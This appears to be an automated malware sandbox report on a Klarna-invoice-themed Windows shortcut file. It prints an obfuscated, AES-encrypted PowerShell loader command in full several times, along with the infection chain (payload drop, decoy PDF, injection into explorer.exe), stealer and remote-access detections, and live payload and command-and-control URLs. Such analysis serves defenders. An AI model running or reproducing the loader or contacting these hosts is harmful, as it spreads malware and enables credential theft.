            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '474A3D80681E00D6A2EF8CD9205A8000631C5C73110F4F3F98F9A3380757A56587AC33C982B8757EDE337D31FE178A5C76E820250B09678E60E099A6640F0003AD5BA580D4079FF31BFB3624F9936FF7E054A6F5E6ADF16AF70F2E258B230F0E119433E36E3EA1E08ACE300686446DBFFA1718086C874FC8A8A09ECE0BFD5827E2193AF83B13A9484213EC696E93EAD4E5C86D3B340D0383DF19D9C6B9177B473A715691E727DD59FAD481BB49CFEA164A8C8A2491D767B90BD1F1A11FC199A39158AB0C73865F35115CBBE29DBEC488B90B0DC061AD5039FE414583BD0E8BD4E7B7672D629DE366DBFAED2D2883ABA50A9A3E095A1B26777F10398DF92E050D286E806395A5648C371F95E62603829AB9CCCACC87BA02D01A00AFE9838ECF66997E0A551A83FFD859BBA6E2E568E9EDF081936A8569161CB274B3B9FC21427BBFF2D5D3CF500872D4A683668F2BA8C3038B93718EE8317DBCCA6305CD634DD1B2335210DC703C66A2F0B81A0128C9E257E324E61A18DA3ABFD1FF42A8E1E1E8F1E7A7E412839AAE35575C1AB8B6072F3F101F284610A7A9532CE85C597BD62A5F4DEB11490AF74CF21ECB396C3208FB1E2589B5CE209FFE1017BD9C5FAECDA99ACB77A243D50657551D5D47F459F8E119B10653DCCB3289C76C9277136D22F53A69199D62D4FFD4041CF72E1A171243BD2074D940A15228E8513CE7A56D65D8EC952DA1892A1C0DD32267424040F32729D596424618D14BC5778CA69A50F5378CE90DD67BF9999C530599FA84EEDF1437CAD4599F3B7A5E7C715AF39F96B02950C66C2C6BA86E0CA9B675D12FDB087692B5AAB0023D114DDA9F406E075D82EBF2F19297D6F614E17214DB113946B455BD69B36718F5E9FDD59B17F24ADE82623F8E02D3779A8A68B9AD01E429B87EFA6E75E2447F0911F56F9765C959A678DCB2037D736BE2BEBFAA18D5CD0E5D31518F484AA55F2B977C501125F80803041206588BADA41525EE9B8028EA58781C70961A6BB0694F09DA35A160ED1AE70FB8C2E6354A6F03BFC8C02611C83AD60917171564EB342465A947A75C12850F40B68C68DF9C5D83328A98798B17DBEA519B0CE39850F7D8E390584FED55BE5059CA71D2719A0D9B3575AD4DA7287E4D5C5F7EFBA6CC3A3F7F4BCD13AC1249B159691B69F1D64638B49A4BB7A28DA57B77892D7E8F00A1D56280ACF19657E31A66DFC23FBA50CFDA53B25280E96E1FBF839A922391F2D69B1839C422568935D9A35EB45649512E2FDFF02BB416951E3F123183CA94CCFCCB683F885C28A6612BE81855A88151A9D947C889DF4B8536261DCAAD58C911647AB6B0D09AAE2E7F0815EF1890124C736FB150D2551F0419A04AA7E0C0AA8A883CD43E6C794BCACCAFBDC6CEA95B925F072D8EC8D52F266541A22E74F87228F055F2EC79DE196F94BD5C59D029B1320B41AAF44D624365A3C1EC5F6B716D4A575948474E4552594C66474E';function cZF ($PgTDvwwB){return -split ($PgTDvwwB -replace '..', '0x$& ')};$kvsOmI = cZF($ddg.SubString(0, 2080));$qlR = [System.Security.Cryptography.Aes]::Create();$qlR.Key = cZF($ddg.SubString(2080));$qlR.IV = New-Object byte[] 16;$GluWYuA = $qlR.CreateDecryptor();$ZwjPYT = [System.String]::new($GluWYuA.TransformFinalBlock($kvsOmI, 0,$kvsOmI.Length)); sal fd $ZwjPYT.Substring(3,3); fd $ZwjPYT.Substring(6)Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\IMAKBWPY.exe "C:\Users\user\AppData\Roaming\IMAKBWPY.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeProcess created: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe "C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe" -burn.clean.room="C:\Users\user\AppData\Roaming\IMAKBWPY.exe" -burn.filehandle.attached=520 -burn.filehandle.self=516
            Source: C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '474a3d80681e00d6a2ef8cd9205a8000631c5c73110f4f3f98f9a3380757a56587ac33c982b8757ede337d31fe178a5c76e820250b09678e60e099a6640f0003ad5ba580d4079ff31bfb3624f9936ff7e054a6f5e6adf16af70f2e258b230f0e119433e36e3ea1e08ace300686446dbffa1718086c874fc8a8a09ece0bfd5827e2193af83b13a9484213ec696e93ead4e5c86d3b340d0383df19d9c6b9177b473a715691e727dd59fad481bb49cfea164a8c8a2491d767b90bd1f1a11fc199a39158ab0c73865f35115cbbe29dbec488b90b0dc061ad5039fe414583bd0e8bd4e7b7672d629de366dbfaed2d2883aba50a9a3e095a1b26777f10398df92e050d286e806395a5648c371f95e62603829ab9cccacc87ba02d01a00afe9838ecf66997e0a551a83ffd859bba6e2e568e9edf081936a8569161cb274b3b9fc21427bbff2d5d3cf500872d4a683668f2ba8c3038b93718ee8317dbcca6305cd634dd1b2335210dc703c66a2f0b81a0128c9e257e324e61a18da3abfd1ff42a8e1e1e8f1e7a7e412839aae35575c1ab8b6072f3f101f284610a7a9532ce85c597bd62a5f4deb11490af74cf21ecb396c3208fb1e2589b5ce209ffe1017bd9c5faecda99acb77a243d50657551d5d47f459f8e119b10653dccb3289c76c9277136d22f53a69199d62d4ffd4041cf72e1a171243bd2074d940a15228e8513ce7a56d65d8ec952da1892a1c0dd32267424040f32729d596424618d14bc5778ca69a50f5378ce90dd67bf9999c530599fa84eedf1437cad4599f3b7a5e7c715af39f96b02950c66c2c6ba86e0ca9b675d12fdb087692b5aab0023d114dda9f406e075d82ebf2f19297d6f614e17214db113946b455bd69b36718f5e9fdd59b17f24ade82623f8e02d3779a8a68b9ad01e429b87efa6e75e2447f0911f56f9765c959a678dcb2037d736be2bebfaa18d5cd0e5d31518f484aa55f2b977c501125f80803041206588bada41525ee9b8028ea58781c70961a6bb0694f09da35a160ed1ae70fb8c2e6354a6f03bfc8c02611c83ad60917171564eb342465a947a75c12850f40b68c68df9c5d83328a98798b17dbea519b0ce39850f7d8e390584fed55be5059ca71d2719a0d9b3575ad4da7287e4d5c5f7efba6cc3a3f7f4bcd13ac1249b159691b69f1d64638b49a4bb7a28da57b77892d7e8f00a1d56280acf19657e31a66dfc23fba50cfda53b25280e96e1fbf839a922391f2d69b1839c422568935d9a35eb45649512e2fdff02bb416951e3f123183ca94ccfccb683f885c28a6612be81855a88151a9d947c889df4b8536261dcaad58c911647ab6b0d09aae2e7f0815ef1890124c736fb150d2551f0419a04aa7e0c0aa8a883cd43e6c794bcaccafbdc6cea95b925f072d8ec8d52f266541a22e74f87228f055f2ec79de196f94bd5c59d029b1320b41aaf44d624365a3c1ec5f6b716d4a575948474e4552594c66474e';function czf ($pgtdvwwb){return -split ($pgtdvwwb -replace '..', '0x$& ')};$kvsomi = czf($ddg.substring(0, 2080));$qlr = [system.security.cryptography.aes]::create();$qlr.key = czf($ddg.substring(2080));$qlr.iv = new-object byte[] 16;$gluwyua = $qlr.createdecryptor();$zwjpyt = [system.string]::new($gluwyua.transformfinalblock($kvsomi, 0,$kvsomi.length)); sal fd $zwjpyt.substring(3,3); fd $zwjpyt.substring(6)
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $ddg = '474a3d80681e00d6a2ef8cd9205a8000631c5c73110f4f3f98f9a3380757a56587ac33c982b8757ede337d31fe178a5c76e820250b09678e60e099a6640f0003ad5ba580d4079ff31bfb3624f9936ff7e054a6f5e6adf16af70f2e258b230f0e119433e36e3ea1e08ace300686446dbffa1718086c874fc8a8a09ece0bfd5827e2193af83b13a9484213ec696e93ead4e5c86d3b340d0383df19d9c6b9177b473a715691e727dd59fad481bb49cfea164a8c8a2491d767b90bd1f1a11fc199a39158ab0c73865f35115cbbe29dbec488b90b0dc061ad5039fe414583bd0e8bd4e7b7672d629de366dbfaed2d2883aba50a9a3e095a1b26777f10398df92e050d286e806395a5648c371f95e62603829ab9cccacc87ba02d01a00afe9838ecf66997e0a551a83ffd859bba6e2e568e9edf081936a8569161cb274b3b9fc21427bbff2d5d3cf500872d4a683668f2ba8c3038b93718ee8317dbcca6305cd634dd1b2335210dc703c66a2f0b81a0128c9e257e324e61a18da3abfd1ff42a8e1e1e8f1e7a7e412839aae35575c1ab8b6072f3f101f284610a7a9532ce85c597bd62a5f4deb11490af74cf21ecb396c3208fb1e2589b5ce209ffe1017bd9c5faecda99acb77a243d50657551d5d47f459f8e119b10653dccb3289c76c9277136d22f53a69199d62d4ffd4041cf72e1a171243bd2074d940a15228e8513ce7a56d65d8ec952da1892a1c0dd32267424040f32729d596424618d14bc5778ca69a50f5378ce90dd67bf9999c530599fa84eedf1437cad4599f3b7a5e7c715af39f96b02950c66c2c6ba86e0ca9b675d12fdb087692b5aab0023d114dda9f406e075d82ebf2f19297d6f614e17214db113946b455bd69b36718f5e9fdd59b17f24ade82623f8e02d3779a8a68b9ad01e429b87efa6e75e2447f0911f56f9765c959a678dcb2037d736be2bebfaa18d5cd0e5d31518f484aa55f2b977c501125f80803041206588bada41525ee9b8028ea58781c70961a6bb0694f09da35a160ed1ae70fb8c2e6354a6f03bfc8c02611c83ad60917171564eb342465a947a75c12850f40b68c68df9c5d83328a98798b17dbea519b0ce39850f7d8e390584fed55be5059ca71d2719a0d9b3575ad4da7287e4d5c5f7efba6cc3a3f7f4bcd13ac1249b159691b69f1d64638b49a4bb7a28da57b77892d7e8f00a1d56280acf19657e31a66dfc23fba50cfda53b25280e96e1fbf839a922391f2d69b1839c422568935d9a35eb45649512e2fdff02bb416951e3f123183ca94ccfccb683f885c28a6612be81855a88151a9d947c889df4b8536261dcaad58c911647ab6b0d09aae2e7f0815ef1890124c736fb150d2551f0419a04aa7e0c0aa8a883cd43e6c794bcaccafbdc6cea95b925f072d8ec8d52f266541a22e74f87228f055f2ec79de196f94bd5c59d029b1320b41aaf44d624365a3c1ec5f6b716d4a575948474e4552594c66474e';function czf ($pgtdvwwb){return -split ($pgtdvwwb -replace '..', '0x$& ')};$kvsomi = czf($ddg.substring(0, 2080));$qlr = [system.security.cryptography.aes]::create();$qlr.key = czf($ddg.substring(2080));$qlr.iv = new-object byte[] 16;$gluwyua = $qlr.createdecryptor();$zwjpyt = [system.string]::new($gluwyua.transformfinalblock($kvsomi, 0,$kvsomi.length)); sal fd $zwjpyt.substring(3,3); fd $zwjpyt.substring(6)Jump to behavior
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009E1719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,16_2_009E1719
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009E3A5F AllocateAndInitializeSid,CheckTokenMembership,16_2_009E3A5F
            Source: explorer.exe, 00000016.00000003.2529304928.0000000005595000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000016.00000003.2529304928.0000000005595000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009CEC07 cpuid 16_2_009CEC07
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeCode function: GetACP,PyOS_snprintf,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_Py_NoneStruct,Py_BuildValue,18_2_6C11FDD0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009B4EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,16_2_009B4EDF
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009A6037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,16_2_009A6037
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009A61DF GetUserNameW,GetLastError,16_2_009A61DF
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009E887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,16_2_009E887B
            Source: C:\Users\user\AppData\Roaming\IMAKBWPY.exeCode function: 16_2_009A5195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,16_2_009A5195
            Source: C:\Windows\SysWOW64\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 22.2.explorer.exe.310000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ryuvnp, type: DROPPED
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 22.2.explorer.exe.310000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000014.00000002.2528588524.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ryuvnp, type: DROPPED
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
            Windows Management Instrumentation
            11
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            11
            Deobfuscate/Decode Files or Information
            OS Credential Dumping12
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts4
            Native API
            1
            Windows Service
            11
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            LSASS Memory1
            Account Discovery
            Remote Desktop Protocol1
            Email Collection
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts23
            Command and Scripting Interpreter
            Logon Script (Windows)1
            Access Token Manipulation
            14
            Obfuscated Files or Information
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Service Execution
            Login Hook1
            Windows Service
            1
            Software Packing
            NTDS157
            System Information Discovery
            Distributed Component Object ModelInput Capture114
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts3
            PowerShell
            Network Logon Script413
            Process Injection
            1
            Timestomp
            LSA Secrets241
            Security Software Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            DLL Side-Loading
            Cached Domain Credentials12
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            File Deletion
            DCSync31
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
            Masquerading
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
            Virtualization/Sandbox Evasion
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Access Token Manipulation
            Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd413
            Process Injection
            Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575736 Sample: KlarnaInvoice229837.pdf.lnk Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 85 passworoggre.click 2->85 87 naubeautylus.ch 2->87 89 x1.i.lencr.org 2->89 99 Suricata IDS alerts for network traffic 2->99 101 Found malware configuration 2->101 103 Windows shortcut file (LNK) starts blacklisted processes 2->103 105 12 other signatures 2->105 15 WMIC.exe 1 2->15         started        18 svchost.exe 1 1 2->18         started        signatures3 process4 dnsIp5 131 Contains functionality to create processes via WMI 15->131 133 Creates processes via WMI 15->133 21 powershell.exe 7 15->21         started        24 conhost.exe 1 15->24         started        91 127.0.0.1 unknown unknown 18->91 signatures6 process7 signatures8 107 Windows shortcut file (LNK) starts blacklisted processes 21->107 109 Powershell drops PE file 21->109 26 mshta.exe 17 21->26         started        31 conhost.exe 21->31         started        process9 dnsIp10 93 naubeautylus.ch 62.182.21.105, 443, 49730, 49734 SUB6GB United Kingdom 26->93 75 C:\Users\user\AppData\...\Headerfrontend[1], PE32 26->75 dropped 127 Windows shortcut file (LNK) starts blacklisted processes 26->127 129 Suspicious powershell command line found 26->129 33 powershell.exe 17 18 26->33         started        file11 signatures12 process13 file14 69 C:\Users\user\AppData\Roaming\IMAKBWPY.exe, PE32 33->69 dropped 36 IMAKBWPY.exe 33->36         started        39 Acrobat.exe 77 33->39         started        41 conhost.exe 33->41         started        process15 file16 71 C:\Windows\Temp\...\IMAKBWPY.exe, PE32 36->71 dropped 43 IMAKBWPY.exe 36->43         started        46 AcroCEF.exe 109 39->46         started        process17 file18 77 C:\Windows\Temp\...\python27.dll, PE32 43->77 dropped 79 C:\Windows\Temp\...\pyexec.exe, PE32 43->79 dropped 81 C:\Windows\Temp\...behaviorgraphloom.dll, PE32 43->81 dropped 83 C:\Windows\Temp\...\msvcr90.dll, PE32 43->83 dropped 48 pyexec.exe 43->48         started        52 AcroCEF.exe 46->52         started        process19 file20 63 C:\Users\user\AppData\...\python27.dll, PE32 48->63 dropped 65 C:\Users\user\AppData\Roaming\...\pyexec.exe, PE32 48->65 dropped 67 C:\Users\user\AppData\Roaming\...\msvcr90.dll, PE32 48->67 dropped 95 Switches to a custom stack to bypass stack traces 48->95 97 Found direct / indirect Syscall (likely to bypass EDR) 48->97 54 pyexec.exe 48->54         started        signatures21 process22 signatures23 111 Windows shortcut file (LNK) starts blacklisted processes 54->111 113 Maps a DLL or memory area into another process 54->113 115 Switches to a custom stack to bypass stack traces 54->115 117 Found direct / indirect Syscall (likely to bypass EDR) 54->117 57 cmd.exe 54->57         started        process24 file25 73 C:\Users\user\AppData\Local\Temp\ryuvnp, PE32 57->73 dropped 119 Injects code into the Windows Explorer (explorer.exe) 57->119 121 Writes to foreign memory regions 57->121 123 Found hidden mapped module (file has been removed from disk) 57->123 125 3 other signatures 57->125 61 conhost.exe 57->61         started        signatures26 process27

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            KlarnaInvoice229837.pdf.lnk13%ReversingLabsShortcut.Trojan.Cross
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\ryuvnp100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\Headerfrontend[1]24%ReversingLabsWin32.Trojan.Midie
            C:\Users\user\AppData\Roaming\UltraChrome\msvcr90.dll0%ReversingLabs
            C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exe0%ReversingLabs
            C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\msvcr90.dll0%ReversingLabs
            C:\Windows\Temp\{1CDFC159-EBDA-4075-AC7E-1811F398BB10}\.ba\pyexec.exe0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://naubeautylus.ch/HeaderfrontendWWC:0%Avira URL Cloudsafe
            https://naubeautylus.ch/KlarnaInvoice42611.pdf0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontend...0%Avira URL Cloudsafe
            https://passworoggre.click/api0%Avira URL Cloudsafe
            https://naubeautylus.ch0%Avira URL Cloudsafe
            https://naubeautylus.ch/IMAKBW0%Avira URL Cloudsafe
            https://naubeautylus.ch/IMAKBWPY.exe0%Avira URL Cloudsafe
            https://naubeautylus.ch/IMAKBWP0%Avira URL Cloudsafe
            https://passworoggre.click/0%Avira URL Cloudsafe
            https://naubeautylus.ch/HeaderfrontendC:0%Avira URL Cloudsafe
            https://naubeautylus.ch/IMA0%Avira URL Cloudsafe
            https://naubeautylus.ch/IMAKBWPY.ex0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontend0%Avira URL Cloudsafe
            https://naubeautylus.ch/Headerfrontend$global:?0%Avira URL Cloudsafe
            https://naubeautylus.ch/IMAKB0%Avira URL Cloudsafe
